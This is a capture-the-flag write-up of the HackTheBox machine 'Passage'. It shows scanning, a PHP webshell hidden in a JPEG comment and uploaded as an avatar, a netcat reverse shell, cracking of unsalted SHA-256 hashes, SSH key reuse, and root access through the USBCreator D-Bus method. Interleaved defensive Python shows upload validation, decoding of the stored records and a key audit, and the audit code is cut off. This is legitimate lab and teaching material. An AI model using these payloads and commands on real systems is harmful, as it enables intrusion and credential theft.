NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-06 12:59 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:59
Completed NSE at 12:59, 0.00s elapsed
Initiating NSE at 12:59
Completed NSE at 12:59, 0.00s elapsed
Initiating NSE at 12:59
Completed NSE at 12:59, 0.00s elapsed
Initiating Ping Scan at 12:59
Scanning 10.10.10.206 [4 ports]
Completed Ping Scan at 12:59, 0.39s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:59
Scanning passage.htb (10.10.10.206) [1000 ports]
Discovered open port 80/tcp on 10.10.10.206
Discovered open port 22/tcp on 10.10.10.206
Completed SYN Stealth Scan at 12:59, 10.06s elapsed (1000 total ports)
Initiating Service scan at 12:59
Scanning 2 services on passage.htb (10.10.10.206)
Completed Service scan at 13:00, 6.89s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against passage.htb (10.10.10.206)
adjust_timeouts2: packet supposedly had rtt of -1057921 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1057921 microseconds.  Ignoring time.
Retrying OS detection (try #2) against passage.htb (10.10.10.206)
Initiating Traceroute at 13:00
Completed Traceroute at 13:00, 0.64s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 13:00
Completed Parallel DNS resolution of 2 hosts. at 13:00, 0.61s elapsed
NSE: Script scanning 10.10.10.206.
Initiating NSE at 13:00
Completed NSE at 13:00, 19.61s elapsed
Initiating NSE at 13:00
Completed NSE at 13:00, 2.25s elapsed
Initiating NSE at 13:00
Completed NSE at 13:00, 0.00s elapsed
Nmap scan report for passage.htb (10.10.10.206)
Host is up (0.56s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
|   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Passage News
Aggressive OS guesses: Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 - 4.11 (93%), Linux 3.13 (93%), DD-WRT v3.0 (Linux 4.4.2) (93%), Linux 4.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 37.993 days (since Thu Jul 30 13:10:45 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)
HOP RTT       ADDRESS
1   633.87 ms 10.10.14.1
2   634.03 ms passage.htb (10.10.10.206)

NSE: Script Post-scanning.
Initiating NSE at 13:00
Completed NSE at 13:00, 0.00s elapsed
Initiating NSE at 13:00
Completed NSE at 13:00, 0.00s elapsed
Initiating NSE at 13:00
Completed NSE at 13:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.33 seconds
           Raw packets sent: 1290 (58.998KB) | Rcvd: 1089 (45.686KB)
PORT 80
The site is filled with lorem ipsum placeholder text. It also mentions Fail2Ban, which means that an IP sending a burst of requests to the site gets blocked for 2 minutes. There is a login page, which you can reach without gobuster; we cannot use gobuster or dirb here, since the ban would trigger again and again.
The site also reveals the version of its CMS, so let's google for an exploit for it.
We will create a new user account, upload an image file as the avatar, and trigger our shell from there.
Steps to create the image carrying the shell-execution command:
┌─[root@liquid]─[~/Desktop/HTB/passage]
└──╼ #exiftool -comment='<?php echo system($_GET['cmd']);?>' download.jpeg
    1 image files updated
┌─[root@liquid]─[~/Desktop/HTB/passage]
└──╼ #file download.jpeg
download.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "<?php echo system($_GET[cmd]);?>", baseline, precision 8, 275x183, components 3
┌─[root@liquid]─[~/Desktop/HTB/passage]
└──╼ #mv download.jpeg download.jpeg.php
Now we can access this file through the upload area.
In the same way we trigger a reverse shell with netcat and get a shell as www-data:
┌─[root@liquid]─[~/Desktop/HTB/passage]
└──╼ #nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.167] from (UNKNOWN) [10.10.10.206] 56550
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
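The upload above works because three things go unchecked: the double extension (download.jpeg.php), the fact that the body is only checked as "an image", and a PHP open tag sitting inside a JPEG COM segment written by exiftool. The following is an added example, not code from the writeup or from CuteNews; it is a hypothetical upload validator plus a JPEG metadata stripper, with a constructed minimal JPEG as input, showing which check catches which trick.

```python
import re

# Avatar types the upload handler accepts, with the magic bytes each starts with.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# PHP open tags. Short tags ("<?") are deliberately not matched, because XMP
# metadata in legitimate JPEGs starts with "<?xpacket"; strip_jpeg_metadata()
# removes those segments anyway.
PHP_TAG = re.compile(rb"<\?php\b|<\?=")


def validate_avatar(filename, data):
    """Return (accepted, reason) for an uploaded avatar (hypothetical handler).

    Rejects a second extension (download.jpeg.php), a body that is not really
    the declared image type, and a PHP open tag smuggled into the image bytes.
    """
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "filename must be name.ext with exactly one extension"
    ext = parts[1]
    if ext not in MAGIC:
        return False, f"extension .{ext} not allowed"
    if not any(data.startswith(magic) for magic in MAGIC[ext]):
        return False, "content does not match declared image type"
    if PHP_TAG.search(data):
        return False, "PHP open tag found inside image data"
    return True, "ok"


def strip_jpeg_metadata(data):
    """Rebuild a JPEG without COM (0xFFFE) and APP1..APP15 (0xFFE1..0xFFEF) segments.

    APP0 (the JFIF header) is kept; everything from SOS (0xFFDA) or EOI (0xFFD9)
    onward is copied unchanged. Dropping these segments is what makes an
    'exiftool -comment' payload disappear from the stored file.
    """
    if not data.startswith(b"\xff\xd8"):
        raise ValueError("not a JPEG")
    out = bytearray(b"\xff\xd8")
    i = 2
    while i + 2 <= len(data):
        if data[i] != 0xFF:
            raise ValueError("corrupt segment marker at offset %d" % i)
        marker = data[i + 1]
        if marker in (0xD9, 0xDA):
            out += data[i:]
            return bytes(out)
        if i + 4 > len(data):
            break
        length = int.from_bytes(data[i + 2:i + 4], "big")  # length includes its own 2 bytes
        segment = data[i:i + 2 + length]
        if marker != 0xFE and not 0xE1 <= marker <= 0xEF:
            out += segment
        i += 2 + length
    raise ValueError("truncated JPEG")


def jpeg_with_comment(comment):
    """Constructed test input: a minimal JFIF APP0 header, one COM segment, then EOI."""
    app0 = b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    com = b"\xff\xfe" + (len(comment) + 2).to_bytes(2, "big") + comment
    return b"\xff\xd8" + app0 + com + b"\xff\xd9"


def demo():
    """Run the writeup's upload and a clean upload through the checks."""
    payload = jpeg_with_comment(b"<?php echo system($_GET[cmd]);?>")  # the comment from the writeup
    return {
        "double extension": validate_avatar("download.jpeg.php", payload),
        "php in comment": validate_avatar("download.jpeg", payload),
        "wrong type": validate_avatar("download.png", payload),
        "after strip": validate_avatar("download.jpeg", strip_jpeg_metadata(payload)),
        "clean": validate_avatar("avatar.jpeg", jpeg_with_comment(b"holiday photo")),
    }


if __name__ == "__main__":
    for name, (ok, reason) in demo().items():
        print(f"{name:18s} -> {'accept' if ok else 'reject'}: {reason}")
```

The extension rule is deliberately strict (one dot only); a production handler would rather discard the client filename and generate its own. Independently of validation, the uploads directory should never be served through the PHP handler, so even a file that slips past the checks is returned as bytes instead of executed.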
Next we need user access in order to read the user flag.
GETTING USER ACCESS
Now let's look through the CMS directory for anything suspicious:
pwd
/var/www/html/CuteNews
cd cdata
pwd
/var/www/html/CuteNews/cdata
cd users
pwd
/var/www/html/CuteNews/cdata/users
ls -l
total 156
-rw-r--r-- 1 www-data www-data  717 Sep  5 23:23 09.php
-rw-r--r-- 1 www-data www-data  109 Aug 30 16:23 0a.php
-rw-r--r-- 1 www-data www-data  137 Sep  5 23:58 0d.php
-rw-r--r-- 1 www-data www-data  125 Aug 30 16:23 16.php
-rw-r--r-- 1 www-data www-data  137 Sep  5 23:54 18.php
-rw-r--r-- 1 www-data www-data  449 Sep  5 23:57 21.php
-rw-r--r-- 1 www-data www-data  137 Sep  6 00:01 2c.php
-rw-r--r-- 1 www-data www-data  137 Sep  5 23:58 2e.php
-rw-r--r-- 1 www-data www-data  109 Aug 31 14:54 32.php
-rw-r--r-- 1 www-data www-data   45 Sep  6 00:31 35.php
-rw-r--r-- 1 www-data www-data  105 Sep  5 22:56 3f.php
-rw-r--r-- 1 www-data www-data  137 Sep  6 00:01 41.php
-rw-r--r-- 1 www-data www-data   45 Sep  5 23:14 4b.php
-rwxr-xr-x 1 www-data www-data  113 Jun 18 08:28 52.php
-rwxr-xr-x 1 www-data www-data  129 Jun 18 08:24 5d.php
-rw-r--r-- 1 www-data www-data   45 Sep  5 23:23 5e.php
-rwxr-xr-x 1 www-data www-data  129 Jun 18 08:28 66.php
-rw-r--r-- 1 www-data www-data  137 Sep  6 00:01 67.php
-rw-r--r-- 1 www-data www-data  137 Sep  5 23:58 6c.php
-rw-r--r-- 1 www-data www-data  133 Aug 31 14:54 6e.php
-rw-r--r-- 1 www-data www-data  137 Sep  5 23:58 73.php
-rwxr-xr-x 1 www-data www-data  117 Jun 18 08:27 77.php
-rwxr-xr-x 1 www-data www-data  481 Jun 18 09:07 7a.php
-rw-r--r-- 1 www-data www-data  109 Sep  5 23:23 82.php
-rw-r--r-- 1 www-data www-data  129 Sep  5 23:23 8b.php
-rwxr-xr-x 1 www-data www-data  109 Jun 18 08:24 8f.php
-rw-r--r-- 1 www-data www-data  589 Sep  6 00:05 94.php
-rwxr-xr-x 1 www-data www-data  129 Jun 18 08:28 97.php
-rwxr-xr-x 1 www-data www-data  489 Jun 18 09:05 b0.php
-rw-r--r-- 1 www-data www-data  121 Sep  5 22:56 b6.php
-rwxr-xr-x 1 www-data www-data  481 Jun 18 09:46 c8.php
-rw-r--r-- 1 www-data www-data   45 Sep  6 00:31 cc.php
-rwxr-xr-x 1 www-data www-data   45 Jun 18 08:26 d4.php
-rwxr-xr-x 1 www-data www-data   45 Jun 18 09:08 d5.php
-rw-r--r-- 1 www-data www-data 1213 Aug 31 14:55 d6.php
-rw-r--r-- 1 www-data www-data   45 Sep  5 23:15 e0.php
-rw-r--r-- 1 www-data www-data   45 Sep  6 00:32 f1.php
-rwxr-xr-x 1 www-data www-data  113 Jun 18 08:28 fc.php
-rw-r--r-- 1 www-data www-data 3840 Aug 30 17:54 lines
-rw-r--r-- 1 www-data www-data    0 Jun 18 08:24 users.txt
We have a set of PHP files here, so let's concatenate their contents into a single file and strip the unwanted parts with Sublime:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/passage]
└──╼ #cat passwords
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODgyOTgzMztzOjY6ImVncmU1NSI7fX0=
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo2OiJlZ3JlNTUiO319
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo1OiJhZG1pbiI7YTo4OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMDQ3IjtzOjQ6Im5hbWUiO3M6NToiYWRtaW4iO3M6MzoiYWNsIjtzOjE6IjEiO3M6NToiZW1haWwiO3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjQ6InBhc3MiO3M6NjQ6IjcxNDRhOGI1MzFjMjdhNjBiNTFkODFhZTE2YmUzYTgxY2VmNzIyZTExYjQzYTI2ZmRlMGNhOTdmOWUxNDg1ZTEiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3OTg4IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODkxMDg5NjtzOjY6ImhhY2tlciI7fX0=
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5OTM3MTgxODtzOjQ6InRlc3QiO319
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzI4MTtzOjk6InNpZC1tZWllciI7fX0=
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjU6ImFkbWluIjt9fQ==
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImtpbUBleGFtcGxlLmNvbSI7czo5OiJraW0tc3dpZnQiO319
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MjA6ImhhY2tlckBoYWNrZXIuaGFja2VyIjtzOjY6ImhhY2tlciI7fX0=
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzIzNjtzOjEwOiJwYXVsLWNvbGVzIjt9fQ==
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJzaWQtbWVpZXIiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzI4MSI7czo0OiJuYW1lIjtzOjk6InNpZC1tZWllciI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToic2lkQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiU2lkIE1laWVyIjtzOjQ6InBhc3MiO3M6NjQ6IjRiZGQwYTBiYjQ3ZmM5ZjY2Y2JmMWE4OTgyZmQyZDM0NGQyYWVjMjgzZDFhZmFlYmI0NjUzZWMzOTU0ZGZmODgiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg1NjQ1IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzA0NztzOjU6ImFkbWluIjt9fQ==
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6InNpZEBleGFtcGxlLmNvbSI7czo5OiJzaWQtbWVpZXIiO319
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTM6InRlc3RAdGVzdC5jb20iO3M6NDoidGVzdCI7fX0=
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJraW0tc3dpZnQiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzMwOSI7czo0OiJuYW1lIjtzOjk6ImtpbS1zd2lmdCI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToia2ltQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiS2ltIFN3aWZ0IjtzOjQ6InBhc3MiO3M6NjQ6ImY2NjlhNmY2OTFmOThhYjA1NjIzNTZjMGNkNWQ1ZTdkY2RjMjBhMDc5NDFjODZhZGNmY2U5YWYzMDg1ZmJlY2EiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3MDk2IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIzIjt9fX0=
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzMwOTtzOjk6ImtpbS1zd2lmdCI7fX0=
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO319
These strings look random, but they are just base64-encoded.
Decoding them gives us some useful text:
a:1:{s:5:"email";a:1:{s:15:"sid@example.com";s:9:"sid-meier";}}
a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"paul@passage.htb";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}
a:1:{s:4:"name";a:1:{s:9:"kim-swift";a:9:{s:2:"id";s:10:"1592483309";s:4:"name";s:9:"kim-swift";s:3:"acl";s:1:"3";s:5:"email";s:15:"kim@example.com";s:4:"nick";s:9:"Kim Swift";s:4:"pass";s:64:"f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca";s:3:"lts";s:10:"1592487096";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"3";}}}
Here we see some password hashes whose format we don't know yet.
Let's put them in a file and crack them with hashcat; before that, the hashid command can tell us which hash formats they could be.
HASHID
┌─[root@liquid]─[~/Desktop/HTB/passage]
└──╼ #hashid e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
Analyzing 'e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd'
[+] Snefru-256
[+] SHA-256
[+] RIPEMD-256
[+] Haval-256
[+] GOST R 34.11-94
[+] GOST CryptoPro S-Box
[+] SHA3-256
[+] Skein-256
[+] Skein-512(256)
HASHCAT
┌─[✗]─[root@liquid]─[~/Desktop/HTB/passage]
└──╼ #hashcat -m 1400 -a 0 hashes ../../THM/Wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz, 5834/5898 MB (2048 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 66 MB

Dictionary cache built:
* Filename..: ../../THM/Wordlists/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec

e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd:atlanta1
Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Name........: SHA2-256
Hash.Target......: hashes
Time.Started.....: Sun Sep  6 11:56:54 2020 (4 secs)
Time.Estimated...: Sun Sep  6 11:56:58 2020 (0 secs)
Guess.Base.......: File (../../THM/Wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4166.7 kH/s (0.91ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/2 (50.00%) Digests
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103]

Started: Sun Sep  6 11:56:29 2020
Stopped: Sun Sep  6 11:56:59 2020
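The manual "paste into Sublime and strip" step above is really two decoding layers: base64, then PHP's serialize() format (a:N:{...} arrays, s:N:"..." strings, i:N; integers). The block below is an added example, not code from the writeup or from CuteNews: a small PHP-unserialize parser that pulls the account records out of two of the base64 lines shown above, flags the password field's shape (64 hex characters, which is why hashid lists only 256-bit digests), and confirms with the recovered password that the stored value is a plain SHA-256 with no salt and no iteration, which is what lets rockyou run through it in four seconds.

```python
import base64
import hashlib
import re

# Two of the base64 lines dumped from cdata/users/ above: the "email" index
# entry for sid-meier and the full "name" record for paul-coles.
SAMPLE_LINES = [
    "YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6InNpZEBleGFtcGxlLmNvbSI7czo5OiJzaWQtbWVpZXIiO319",
    "YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19",
]


def _parse(buf, pos):
    """Parse one PHP-serialized value starting at buf[pos]; return (value, next_pos).

    Only the three types these user files use are handled: i (int), s (string), a (array).
    """
    kind = buf[pos]
    if kind == "i":
        end = buf.index(";", pos)
        return int(buf[pos + 2:end]), end + 1
    if kind == "s":
        colon = buf.index(":", pos + 2)
        n = int(buf[pos + 2:colon])        # declared length in bytes
        start = colon + 2                  # skip ':"'
        return buf[start:start + n], start + n + 2  # skip the closing '";'
    if kind == "a":
        colon = buf.index(":", pos + 2)
        count = int(buf[pos + 2:colon])
        pos = colon + 2                    # skip ':{'
        items = {}
        for _ in range(count):
            key, pos = _parse(buf, pos)
            value, pos = _parse(buf, pos)
            items[key] = value
        return items, pos + 1              # skip '}'
    raise ValueError(f"unsupported type {kind!r} at offset {pos}")


def php_unserialize(text):
    value, end = _parse(text, 0)
    if end != len(text):
        raise ValueError("trailing data after serialized value")
    return value


def decode_line(b64):
    # latin-1 keeps one character per byte, so s:N lengths match PHP's byte counts.
    return php_unserialize(base64.b64decode(b64).decode("latin-1"))


def extract_accounts(lines):
    """Collect the full user records (the 'name' index entries) as {username: fields}."""
    accounts = {}
    for line in lines:
        record = decode_line(line)
        for username, fields in record.get("name", {}).items():
            accounts[username] = fields
    return accounts


def classify_password_field(value):
    """Shape check on a stored password field; 64 hex chars is what hashid was given above."""
    if re.fullmatch(r"[0-9a-f]{64}", value):
        return "64 hex chars: unsalted 256-bit digest (hashcat -m 1400 if it is SHA-256)"
    if value.startswith(("$2y$", "$2b$", "$argon2")):
        return "salted, iterated password hash"
    return "unrecognised"


def is_unsalted_sha256(password, stored):
    """True when stored == SHA-256(password): no salt, no work factor."""
    return hashlib.sha256(password.encode()).hexdigest() == stored


if __name__ == "__main__":
    users = extract_accounts(SAMPLE_LINES)
    for name, f in users.items():
        print(name, f["email"], "acl=" + f["acl"], classify_password_field(f["pass"]))
    print("paul-coles stored as raw SHA-256:", is_unsalted_sha256("atlanta1", users["paul-coles"]["pass"]))
```

The parser is deliberately minimal (no objects, booleans or references), which is enough for CuteNews' user index files; anything else raises instead of silently misparsing. The takeaway for anyone running such a CMS is the last line: an unsalted fast hash means every weak password in the store falls to a wordlist in seconds.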
We have recovered a password, so let's su to paul:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/passage]
└──╼ #rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.167] from (UNKNOWN) [10.10.10.206] 56818
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@passage:/var/www/html/CuteNews/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@passage:/var/www/html/CuteNews/uploads$ su paul
su paul
Password: atlanta1
paul@passage:/var/www/html/CuteNews/uploads$ id
id
uid=1001(paul) gid=1001(paul) groups=1001(paul)
paul@passage:/var/www/html/CuteNews/uploads$ cd
cd
paul@passage:~$ cat user.txt
cat user.txt
4d9294ce4436ff3da172d66503c1a579
paul@passage:~$
Now we need the second user. Looking in paul's .ssh directory, the key pair there is nadav's (the public key's comment reads nadav@passage), so the same keys let us ssh to nadav like this:
paul@passage:~$ cd .ssh
cd .ssh
paul@passage:~/.ssh$ cat id_rsa.pub
cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d nadav@passage
paul@passage:~/.ssh$ ssh nadav@127.0.0.1
ssh nadav@127.0.0.1
Last login: Sat Sep  5 23:15:08 2020 from 127.0.0.1
nadav@passage:~$ id
id
uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
nadav@passage:~$
We now have access as nadav.
GETTING ROOT ACCESS
Now we run a simple command to list setuid binaries:
find / -perm -u=s 2>/dev/null
nadav@passage:~$ find / -perm -u=s 2>/dev/null
/bin/mount
/bin/umount
/bin/ntfs-3g
/bin/ping
/bin/su
/bin/fusermount
/bin/ping6
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
/usr/sbin/pppd
nadav@passage:~$
The D-Bus helper stands out here, and it is exploitable; the technique is described at this link:
https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/
What this gives us is the ability to write a file into root's home directory, so we simply drop an SSH public key into root's .ssh folder and ssh in as root. That's it.
Steps to follow:
Copy the id_rsa.pub file into root's .ssh folder under the name authorized_keys, as shown below:
nadav@passage:~$ pwd
/home/nadav
nadav@passage:~$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d nadav@passage
nadav@passage:~$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/authorized_keys /root/.ssh/authorized_keys true
()
nadav@passage:~$
Now we simply ssh to root with nadav's id_rsa private key, since it is nadav's public key that we copied into root's .ssh directory:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/passage]
└──╼ #ssh -i id_rsa_nadav root@10.10.10.206
load pubkey "id_rsa_nadav": invalid format
Last login: Sun Sep  6 00:02:42 2020 from 10.10.14.167
root@passage:~# id
uid=0(root) gid=0(root) groups=0(root)
root@passage:~# cat root.txt
25502e954f14256de32fed0abc79cc87
root@passage:~#
And there is the root flag.
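Both lateral moves on this box ride on one SSH key turning up where it does not belong: nadav's key pair sitting in paul's .ssh directory, and then nadav's public key landing in root's authorized_keys. Those are exactly the conditions an administrator can audit for. The following is an added example, not code from the writeup: a hypothetical audit over the .pub and authorized_keys files gathered from each home directory, with a constructed key blob standing in for the real one, reporting keys whose comment names a different account and keys that appear under more than one account.

```python
import re
from collections import defaultdict

# Key type, base64 blob, optional comment. authorized_keys lines may carry
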